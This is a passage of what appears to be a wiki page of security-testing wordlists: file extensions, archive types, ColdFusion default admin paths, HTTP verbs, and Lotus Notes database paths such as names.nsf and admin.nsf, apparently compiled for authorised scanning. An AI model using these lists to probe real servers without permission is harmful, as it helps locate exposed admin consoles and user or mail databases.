.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
